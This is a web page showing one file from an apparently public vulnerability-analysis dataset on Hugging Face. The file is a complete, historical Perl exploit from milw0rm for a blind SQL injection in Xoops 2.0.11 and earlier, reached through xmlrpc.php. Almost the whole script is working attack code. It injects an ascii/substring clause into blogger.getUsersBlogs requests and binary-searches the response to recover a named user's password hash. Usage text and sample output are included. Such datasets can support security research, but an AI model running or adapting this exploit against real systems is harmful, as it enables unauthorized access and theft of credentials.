Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1082.txt163 linesDownload Raw Back to exploits
1#!/usr/bin/perl

2

3## Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC

4## based on http://www.gulftech.org/?node=research&article_id=00086-06292005

5## coded by 1dt.w0lf

6## RST/GHC

7## http://rst.void.ru 

8## http://ghc.ru

9

10## example:

11## r57xoops.pl -u http://www.xoops2.ru/xmlrpc.php -n Alexxus

12## ---------------------------------------------------------------

13##   Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC

14## ---------------------------------------------------------------

15## [~]  URL : http://www.xoops2.ru/xmlrpc.php

16## [~] NAME : Alexxus

17## [~] SEARCHING PASSWORD ... [ DONE ]

18## ---------------------------------------------------------------

19##  USER NAME : Alexxus

20##  USER HASH : a26c7baaa40ab863f9b22c8649427fa6

21## ---------------------------------------------------------------

22

23use LWP::UserAgent;

24use Getopt::Std;

25

26getopts('u:n:');

27

28$url  = $opt_u;

29$name = $opt_n;

30

31if(!$url || !$name) { &usage; }

32

33$s_num = 1;

34$|++;

35$n = 0;

36&head;

37print "\r\n";

38print " [~]  URL : $url\r\n";

39print " [~] NAME : $name\r\n";

40print " [~] SEARCHING PASSWORD ... [|]";

41

42while(1)

43{

44if(&found(47,58)==0) { &found(96,103); } 

45$char = $i;

46if ($char=="0") 

47 { 

48 if(length($allchar) > 0){

49 print qq{\b\b DONE ] 

50 ---------------------------------------------------------------

51  USER NAME : $name

52  USER HASH : $allchar

53 ---------------------------------------------------------------

54 };

55 }

56 else

57 {

58 print "\b\b FAILED ]";

59 }

60 exit();  

61 }

62else 

63 {  

64 $allchar .= chr($char); 

65 }

66$s_num++;

67}

68

69sub found($$)

70 {

71 my $fmin = $_[0];

72 my $fmax = $_[1];

73 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

74 

75 $r = int($fmax - ($fmax-$fmin)/2);

76 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";

77 if ( &check($check) ) { &found($r,$fmax); }

78 else { &found($fmin,$r); }

79 }

80 

81sub crack($$)

82 {

83 my $cmin = $_[0];

84 my $cmax = $_[1];

85 $i = $cmin;

86 while ($i<$cmax)

87  {

88  $crcheck = "=$i";

89  if ( &check($crcheck) ) { return $i; }

90  $i++;

91  }

92 $i = 0;

93 return $i;

94 }

95 

96sub check($)

97 {

98 $n++;

99 status();

100 $ccheck = $_[0]; 

101

102 $data  = '<?xml version="1.0"?>';

103 $data .= '<methodCall>';

104 $data .= '<methodName>blogger.getUsersBlogs</methodName>';

105 $data .= '<params>';

106 $data .= '<param>';

107 $data .= '<value><string></string></value>';

108 $data .= '</param>';

109 $data .= '<param>';

110 $data .= '<value><string>'.$name.'\' AND ascii(substring(pass,'.$s_num.',1))'.$ccheck.')/*</string></value>';

111 $data .= '</param>';

112 $data .= '</params>';

113 $data .= '</methodCall>';

114

115 $req = new HTTP::Request 'POST' => $url;

116 $req->content_type('application/xml');

117 $req->content($data);

118 $ua = new LWP::UserAgent;

119 $res = $ua->request($req);

120 $reply= $res->content;

121 if($reply =~ /Selected blog application does not exist/) { print "\n [-] NEWS BLOG DOES NOT EXIST =(\n [-] EXPLOIT FAILED!\n"; exit(); }

122 if($reply =~ /User authentication failed/) { return 0; }

123 else { return 1; }

124 }

125 

126sub status()

127{

128  $status = $n % 5;

129  if($status==0){ print "\b\b/]";  }

130  if($status==1){ print "\b\b-]";  }

131  if($status==2){ print "\b\b\\]"; }

132  if($status==3){ print "\b\b|]";  }

133}

134

135sub usage()

136 {

137 &head;

138 print q(

139  USAGE:

140  r57xoops.pl [OPTIONS]

141  

142  OPTIONS:

143  -u [URL]      - path to xmlrpc.php

144  -n [USERNAME] - user for bruteforce

145  

146  E.G.

147  r57xoops.pl -u http://server/xoops/xmlrpc.php -n admin

148 ---------------------------------------------------------------

149 (c)oded by 1dt.w0lf

150 RST/GHC , http://rst.void.ru , http://ghc.ru

151 );

152 exit();

153 }

154sub head()

155 {

156 print q(

157 ---------------------------------------------------------------

158   Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC

159 ---------------------------------------------------------------

160 );

161 }

162

163# milw0rm.com [2005-07-04]